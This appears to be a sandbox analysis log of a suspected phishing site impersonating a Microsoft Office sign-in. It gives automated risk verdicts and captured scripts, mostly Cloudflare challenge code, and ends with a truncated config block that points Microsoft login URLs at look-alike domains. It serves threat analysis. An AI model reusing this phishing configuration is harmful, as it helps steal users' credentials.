URL: http://office.yacivt.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: http://office.yacivt.com |
URL: https://office.yacivt.com/wriEcFSZ... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "office.yacivt.com",cType: 'managed',cRay: '8f39dfc639ba4240',cH: '08CNZvnPtYFKcwdYQS1XXWRji7E8SU7fWgvpAa5RxQU-1734469556-1.2.1.1-UfUy.ODFxe9PsYLMRr4LyLa7eQi8i8ZlX_7thhkzxaR34VgDgE2PEM7wkWmdfpIt',cUPMDTk: "\/wriEcFSZ?__cf_chl_tk=u3QxlQJkYaRJN0Gk8SDYFFeQ8eDAqPZYTcxDksVOHps-1734469556-1.0.1.1-WZT0OAR1XUlx1H5hmO9y0jJnW.5wAnZNubxrtsjemSk",cFPWv: 'b',cITimeS: '1734469556',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/wriEcFSZ?__cf_chl_f_tk=u3QxlQJkYaRJN0Gk8SDYFFeQ8eDAqPZYTcxDksVOHps-1734469556-1.0.1.1-WZT0OAR1XUlx1H5hmO9y0jJnW.5wAnZNubxrtsjemSk",md: "SGAslMM4i8m1eDYXNcJJmBdcDhFle.qZQbJdUQYh0xw-1734469556-1.2.1.1-Oe41dRsYOYOU_MbpP8Hieup6JzWRzeoy97_ywEiwATazCatCLKeo9l4OT39qYS52.qBBm89qj6BrkzDnto4N_NG3_VhtAUwOt2lE1E6a52soLVdrOFqHXkInZ377hwiruaQCBEMmRyUhhQUqNR4mKXCeghcAvUxB1nF.Ep62tRNoKVBT3Y69BZsSz7U5doEqAWbVjZHJQILUbw_Rx6oPTJD9_M17_rwufxB.RlGCZ_MPzmvGkUMqirZTj6k4LFiXxnUwqVRuMi9pUChkUol0AtQf7EZdxDMzoPTt5K8i6q_0g.5acMUcxAni42GnNbyvA98oPbZxW8OC4EiLItUZJ7WK3G59R3FoegN19qdgthzxna_I9q4bQwuNIzIlmsIa.1p_VWrHSkgXLWGZFDGpmTukn306GAhxeOAJa4MPLTNcFFwpdzFF6LJhHH24qnj.UWan_ieS42GPPsvibjhMCpAfQMSXtNf1d.MrKGuzwE.bKem43Y2GJnSBGRf86XM6vmsrUV3CXSvf0NW0ZQoo_zI1NtN84fdXBRjJJfGdSud20Up7BYklhSKbbkTQL_x1pjFUSwrFLcBWwBpHOH6WVFRjEjVZiT1wnebB8uJ6a4jEcfVdnm5IezoRaMEPn9qEa9TG5HzSvACHvUHwV33U.0k31D1BZxy8bi6VdZieHLcJAaBwKPIHtmIN6.jBu2toD4adiMkDtmADcCj0tie8NHa90.dhWqLDpwdVhCCFb6NYtREyjRoCgBUHSpM2IJHdYxkfywG7I8Bw1vXWpoOeWRKKC94OW9nd6iwx9Ouudq30bV1mJMBoCe_IMEPpR.Kp.lGxkFRVfHIdDRk1HmsxRumSVCziUN.ofNWve4zTsUigu8ciALJ0mO1wE4k.PJeiizzYsvjMdCyZPobI0OOLgIuREEepvHtQWNbix4Og3HDOSubmzTlKO6f_vWOct9vmxGaDeCxAp52bbKHCaZFqp4HddcZbHvHFDTr2m.qxrysCyz7susbklQzTepXefWIa7GxOt6Q5wbFfZicQ2LuSmqNPFDx59ReJ.cO3smPGI3FKCYXTOga_zNSlXcROfvy_M4mU83ySdIOsKpqiy6N_I3MXOCTaM4vuo7L4YL4AzXNEWUXstJDbS7EAB1nv80dyUoxdDE6K8uoRj2Lvz.i7B3l3TNS3PiisL55NbxzjGALXS24HvTBn1rxDbVyFnIQDw91UocUEs8LTvEz1ABOZUeyWfEANh13JXQ57e8fmp.CSuzDTM94JP6IQtBrdLea0hqxodUztHl28GnWz7EujZm6OEO.Cnz6hohn91BZR2nT5zkAxcG3nhIou_4cxAW02Cq13Br98b461n7IaLy_Jkay7kX0tZoxOUFoAhmzPcywl_DCBy53l07xX3TaDEi4bRbDUpxqSY1pmoA_jWZ6L4LeN58DA_FX5eEX.2eTlRrGOdhwWSHL16AryP20A_Dg1Wiz7O7PmFVZKF1RJMcE7sv8Q9URRQZ4SB6kvwfK8MN_ILvnNtY_VT_JiwqPb07Re.2qT6TTguJBtecLv7hLAGDsByvyym0xNlJ.3WlOO4bj_d55zTrmd3amzUKAewSJuzZf_amL5FbMdU.swRyTozC9FMtTR6J_1qE6NZO_LRiOAtM.oY2PORyyWfbe1w7GYfb5F7Mq1lLH9yKUkYjsuI2iUrwH2p7IwbEdU.L4nnI7BYPwfVEJwJkMm8l7nbhq.w_bI5UVmnbyB3dNy8fC2M0H4ob.nhgJgcS2h79KO2tTPin7ml.0diFyJiJojRM9WK2YUIp6nZXzpFyUOq0ARBzJuj6kzR_dms5tbWop2wkIRFo7b7KUVUuYfAEWnj7W2la_oxeX_4CsceAZ6fcTMm5Az0scbAq_M1D_s5Z5CnPuaSSh5cC7GYAJWKOSj2TjtGXSRSB374wJcTX3GJm2XwMaHSyR0nEE4bNPhs3Tx7RV.3Ce1OQUVnbQsMsoEGF3VTNcTu50Huh3gv66A2THzSx0pFnKfJfMfQIzL7h2jUdvmOCS6nWaxOaKG3Ln038k4P1BoNWOCLvjpkHmZ3.8.9X0i1F6Hu5lZTPoiqWyAzbDRJdnBxf9u6DTjIxZLUoVmxzT_2YDYJjywupsAXexOkJ1zjBJDoTJ3DJXbnk2LK.u1N.W4EqNMFfveCJa30mx5QZkrfZFH4RKAVD.fRBz76WAGV7gRALkdlaMk1oS3AkoOCzU3Tubg5UHHTgEnOkfZwCVKusVSO1p_fvn_y5Khixpgbvu3zFSX_.1Y5dHZ98BhXe8WtUjJGgOV8lLHFQDTDPLs7k.KVNRoLd4K0soSrKBfioux76kbSiyn0fcpNYdvd0NWSFoPVc9DfGy1NOh0EUiF7.U7mPY99GVYnMRpWG6LvlZxh7YzolguEQRvkcW_4452Y6vmsV.mQTQpoH3cfjZrlUxZBzNWrveuzFO1iTFO_ecVFPuh_CurxowtPOdgwVonTGnLqo4MkZ6agZTfMTNODoqoABwRgGTNYrBYwerv4JYuvgqtrgHgjXOKdg37mg53rgFVzsbEvkYaImZCQgEtCwbLyG5l4bEVTPMm384MrJ8VnErXYaX4NXpoQhs",mdrd: "bt1LEfAkNJ3..wQw07I_snb0qFhubK.gD9lAZrvT5j8-1734469556-1.2.1.1-BYvi3ahEfaZxDxCbXtzAte.bXCm6DaRS69Hv.DB.NpcWRZKuyWuCAbRV0o3yxQ8d_Fh1JYZt_RCAhw2F1W67stRIAx51GMoHkn8CbLOX7auQdRVO7osIT7J7oQs.JiRkygyCaNGxq81aLEqVyTvnKJkYnE90Hdb.DqEzEAfjV3qPJAtnPoD9nlR6_ekZ7RgZ40ovVfNIoLzFn7k7E7dUucAcN1_zQbwVsKJhvJwVAn1tD44ZczHRlcFVZc5fA5h5J1_Ai4kPi7WKUSzSKPd7FntpXQfQTk7NzCZeQrWUzoqM_hMTejsUX2NvLlvbV9ys3Qymzh8khSW3gV2H17jf3h2UAb63RFAMYVinxmUNnM_GFmpX_Bjv8bbd_8hBMbRnWjuUY21.IMyKvHfZQ7EaNhcnk6Ez86ZZ3iSEtgEXpMsmxZownNOuu5crTR65BN1ii0g0wLmDvU7vGBtI19fZIoVPjSAJvAsfB7RbXiMFRadw01aMMJ78ltYKzWTIfHqbVE.rofWpj6BbBk7CtFJzkc5Oa1EHg0mOLKLBiJylxyiHoDqu8WT4G3WWKWD_aWeZZod36OEBCwPhUtohhxNgRiuSX2IJnso8SYC7wYHhEI65zX7geGEzPBk |
URL: https://office.yacivt.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://office.yacivt.com |
URL: https://challenges.cloudflare.com/turnstile/v0/b/7... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate behavior for websites that use Cloudflare's security services. The script sets up various configuration options for the Cloudflare challenge and includes some communication between the script and the parent window. While it uses some techniques like message passing and dynamic configuration, these are common practices for Cloudflare's challenge system and do not indicate any malicious intent. The script does not exhibit any high-risk behaviors, and the overall risk is low."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'bf0t8',
chlApiSitekey: '0x4AAAAAAADnPIDROrmt1Wwj',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'JPVX3ghKOhJvx1YZykA8KrtP.x3c8qvku1KcOXcFK2Y-1734469564-1.3.1.1-aH7bUfwakjPosP_qyuSnjQeA7xy3Z5pbIS.mE4Yun7I',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f39dffadb8d8c06',
cH: 'lrXzJeZtSKYS6NqCTVMsFe1grHp2TpeoBkAlSwJb.OM-1734469564-1.1.1.1-RfJ5.rK95DnPSI6q_x.4fpt7WEysU.xaymZaHu1jXejKliO25vJ8LT42Ycyt4B7R',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'fCymOqtI9OCXewqlEEoUTYmdOHOBJu9OxUm_qHpLPf8-1734469564-1.1.1.1-BeXNYoYHq8rj8oCqv1FZn_5PLfAp8KhTvgUV8xgBrGnReJL0BiR1gNPKHmYJ.rb77vwWYwIEo5rJzfWhsG6enbLsBu9Uop55ypL_i13L67zbXzcLl1P5CSMg5PX_7x0TET_eWe3bJG0zcivph7VkX3.wicigF7O9xzE8AbV9q5p_52OSYT9nFT7kO3XIGrDuj5IUg6WKjWvPMEpvjcWRYTD57WAHp4cxNOGWrRv8nS6eNllS7.jIgVPvo1mtmEFogovGCPqMLKQTjKWJwK.QVUt6NbU7VqUoLQyh1_8kCP3WS6VV8gwPLeQ5Ffd1aTV8bCU0GRtoMsC1Kb0TKw7JzJUWdUTdB2mOe.wo8Lt7p4BEL7PFJcb4lZVRAS8Dd802VarLBunv8L5C_SKzG.91aK3MLCebjQHquXt2Nk8ZHIIWKOdhwvydrfaiRMxJn1fR5ZiSRojvQ_1nIjY8QxTVEz.AhVwLM_7SScd9F1Si363XHMef9OZPcYmV3J48YergURp1rDRKzSeQ3xq5iRkyKkS5jbkmt3_UnSDgASLMzA6bEFZf1r_.Yv.aH10oTfM4vGfdj1FCxewDYpBfXdZ298ePHuHZlZw6uRI6mSW7FBsr4uisu5XvZ8kJh_MQjsG6.d0CvnmPU8Nv_0vPSG63L1yG3cNpwpLE5yVb2I6tiU80VQPKSF3c3Tk3In9nr3zHQqm._vtnhsAdwHIM34vyTH2tTFRmaUFgeE0UlCiVOCbckdToV8hDrG.NpdJz6zoqDPQO6RPiMB6DsEp_MhHTmAP5XbrySnvFZ_RFkPLGUKXmzgknDVGcmdv6dQa8PI06G0vxtsG6ks4imBiD762.kZ8YUaojOyCSjXRdjpYeM.RBB9w1isRHs2PMgXIxzd5qxVrvL0sr2WJ3UWtL9yR4Cg25M6Haixxx.MaurBb4XeRzPo9pV57M2nY_wPjfBHGL_mFT8F9UydsBziXBIyiOkYSJmZgFFndjNDXg0rgbudSAkYfvgrePxTZ3snY50tZahjoxWcECXZVPuQDN4bEWD.4wBfBwBnGAoj1IQORriDvz4brF4T_9tyN1JpjsiqEUMJj8C9ngOnzPFM9izeQgi.q8BqwWnonLh2OrCo8LWOP2_o3obIg1vj6w9OQ.uliLZI1aHL9NmfAO7PlHGTJ3lf9iDUg3o5Acln2aCKRuH448StdxwREZdDxb7zz2IOl_lgUUZUGJ85aOaoEgXfucXYuji7e9i5MY3snV_nZIvcBn35ImQyVObZ0eWfiJoIDciDd4ircrwh0fJEaU8LUpgetvMnGKsuj4.eUmZMRb.3XJATNWCJ8QrHyJmzib420fAIwgONxg91dXLXj_AJx1Q7a.9Flih0AqEzrYcFWoRVFZj1w7qyFxf8xlWR1YAdvV',
cITimeS: '1734469564',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'bf0t8',
nextRcV: 'JPVX3ghKOhJvx1YZykA8KrtP.x3c8qvku1KcOXcFK2Y-1734469564-1.3.1.1-aH7bUfwakjPosP_qyuSnjQeA7xy3Z5pbIS.mE4Yun7I',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare Turnstile challenge implementation, which is a legitimate security mechanism used to verify user interactions. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles the translation and configuration of the Turnstile challenge, which is a common practice for websites that use Cloudflare's security services. While the script uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely part of a legitimate website's security measures and does not raise significant security concerns."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_success":"Success%21","turnstile_footer_terms":"Terms","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","human_button_text":"Verify%20you%20are%20human","turnstile_feedback_description":"Send%20Feedback","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","testing_only":"Testing%20only.","turnstile_verifying":"Verifying...","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_footer_privacy":"Privacy","turnstile_refresh":"Refresh","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_failure":"Error","turnstile_overrun_description":"Stuck%20here%3F","turnstile_feedback_report":"Having%20trouble%3F","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_timeout":"Timed%20out","turnstile_expired":"Expired"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eR,fk,fl,fm,fq,fr,fy,fC,fF,fI,fK,fL,fM,fY,ga,gg,gh,gi,gs,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1018))/1*(-parseInt(gI(439))/2)+-parseInt(gI(467))/3*(parseInt(gI(1139))/4)+parseInt(gI(1008))/5+parseInt(gI(891))/6*(-parseInt(gI(1137))/7)+-parseInt(gI(1020))/8*(-parseInt(gI(1365))/9)+parseInt(gI(1205))/10+-parseInt(gI(1341))/11,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,162071),eM=this||self,eN=eM[gJ(601)],eO=[],eP=0;256>eP;eO[eP]=String[gJ(518)](eP),eP++);eQ=(0,eval)(gJ(1053)),eR=atob(gJ(792)),eM[gJ(1091)]=function(c){try{return fj(c)}catch(e){return fh(fi(c))}},fk=function(c,hs,f,g,h,i,j,k){for(hs=gJ,f={'vQDoH':function(l,m){return l+m},'MOVGG':function(l,m){return l(m)},'wXQlj':function(l,m){return l%m}},k,h=32,j=f[hs(1338)](eM[hs(1327)][hs(1037)],'_')+0,j=j[hs(462)](/./g,function(l,m,ht){ht=hs,h^=j[ht(521)](m)}),c=eM[hs(638)](c),i=[],g=-1;!f[hs(1096)](isNaN,k=c[hs(521)](++g));i[hs(708)](String[hs(518)](((255&k)-h-f[hs(137)](g,65535)+65535)%255)));return i[hs(359)]('')},fl={},fl[gJ(745)]='o',fl[gJ(1337)]='s',fl[gJ(1491)]='u',fl[gJ(1484)]='z',fl[gJ(1531)]='n',fl[gJ(1219)]='I',fl[gJ(1221)]='b',fm=fl,eM[gJ(1313)]=function(g,h,i,j,hy,o,x,B,C,D,E,F){if(hy=gJ,o={'TfQSR':function(G,H){return G===H},'xCoMx':function(G,H){return G(H)},'TsxQo':function(G,H){return G+H},'nVzKc':function(G,H,I){return G(H,I)},'jhJig':function(G,H){return G+H},'dgujH':function(G,H,I){return G(H,I)}},o[hy(857)](null,h)||o[hy(857)](void 0,h))return j;for(x=fp(h),g[hy(934)][hy(640)]&&(x=x[hy(298)](g[hy(934)][hy(640)](h))),x=g[hy(1320)][hy(924)]&&g[hy(1437)]?g[hy(1320)][h |
URL: https://office.yacivt.com/wriEcFSZ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://office.yacivt.com/wriEcFSZ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://office.yacivt.com/wriEcFSZ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Verify you are human",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://office.yacivt.com/wriEcFSZ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. It includes external data transmission to potentially untrusted domains, the use of obfuscated URLs, and the presence of fallback domains. While the script may have a legitimate purpose, such as authentication or analytics, the lack of transparency and the use of questionable practices warrant further investigation to determine the true intent and potential risks."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://ywnjb.yacivt.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.yacivt.com%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.yacivt.com%2flandingv2\u0026response_type=code+id_token\u0026state=l6BTM8D70dyZpNtlmK9yP7pGcVJJkYIuCnzjG4ZCjnuNmRf69zWEx5SNwmNeeCLEHhtNj3-XJVrZR76PiFDwL1SwilGZk2eEVrXFdAiBU72BufoEi41Y172sL8lPoxuYI8o6qHDNnvcdKMbCR0XzEc-yC94Vsm8XhjIPAE1BAsxOTqaWVneplzoe-4aZvR8YHENzT2sxUahoRcn7Lzj6NsqiVdwQAWKX7W4gtrPqy8-ovgh1zOZRXMDyCt-8tXE-A2110vJYi2der3W4JaYeVg\u0026response_mode=form_post\u0026nonce=638700663924236788.M2JhMTQ3M2MtOTY5ZS00ODU1LWFkZGEtNDA3N2M2NjI0MGM0MTEwZDlkOTEtMWY3Yi00NmNmLWE3ZjMtOTA3MTZiN2YzMjJj\u0026x-client-SKU=ID_NET8_0\u0026x-client-Ver=7.5.1.0\u0026uaid=37a7e2c64a3b47f6a0afccced59b0b1f\u0026msproxy=1\u0026issuer=mso\u0026tenant=common\u0026ui_locales=en-US\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026epct=PAQABDgEAAADW6jl31mB3T7ugrWTT8pFe4rEtWNcG3jVQ2acCxZBwh4rInKHISb2qr30V5wo0DdNwu4csBLONgCsISQUT1je3QNvgPBHlvV1EVUY5hIXojxE7ALSZz5XKqJDr82GGd-l-kOJd3gLptfLP38W608RK35M6zoXnhwNcgYYxaD__DCo3pRqza-VZgRyoezn1mnLntvPG4atDMhpxnpt-gG9lFD-I5WlcvOOYpdrxSAnAmiAA\u0026jshs=0","urlMsaLogout":"https://ywnjb.yacivt.com/logout.srf?iframed_by=https%3a%2f%2foffice.yacivt.com","urlOtherIdpForget":"https://ywnjb.yacivt.com/forgetme.srf?iframed_by=https%3a%2f%2foffice.yacivt.com","showCantAccessAccountLink":true,"urlGitHubFed":"https://ywnjb.yacivt.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.yacivt.com%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.yacivt.com%2flandingv2\u0026response_type=code+id_token\u0026state=l6BTM8D70dyZpNtlmK9yP7pGcVJJkYIuCnzjG4ZCjnuNmRf69zWEx5SNwmNeeCLEHhtNj3-XJVrZR76PiFDwL1SwilGZk2eEVrXFdAiBU72BufoEi41Y172sL8lPoxuYI8o6qHDNnvcdKMbCR0XzEc-yC94Vsm8XhjIPAE1BAsxOTqaWVneplzoe-4aZvR8YHENzT2sxUahoRcn7Lzj6NsqiVdwQAWKX7W4gtrPqy8-ovgh1zOZRXMDyCt-8tXE-A2110vJYi2der3W4JaYeVg\u0026response_mode=form_post\u0026nonce=638700663924236788.M2JhMTQ3M2MtOTY5ZS00ODU1LWFkZGEtNDA3N2M2NjI0MGM0MTEwZDlkOTEtMWY3Yi00NmNmLWE3ZjMtOTA3MTZiN2YzMjJj\u0026x-client-SKU=ID_NET8_0\u0026x-client-Ver=7.5.1.0\u0026uaid=37a7e2c64a3b47f6a0afccced59b0b1f\u0026msproxy=1\u0026issuer=mso\u0026tenant=common\u0026ui_locales=en-US\u0026epct=PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeiPn_FX6mdVl3cVMajz3UDii-wAGw3UOUjMJiZKPah4g1ZRLJfWFaVypgbbAMV4HwzxNwvZEVhGpdiYpFEA8Nt9EMUs4oDRiS-hkctjgRdfgorAQ1PJt-ZhIOaPQhcBDQHpXFYpMEk0h3L5QbRV-S7Z5UXPmcAujUfMRxU1LpJRThRm1dbDDIgf652bCsCKXDlp7h8xpN4XDkSnv4-fTD9SAA\u0026jshs=0\u0026idp_hint=github.com","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Bel
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 3,
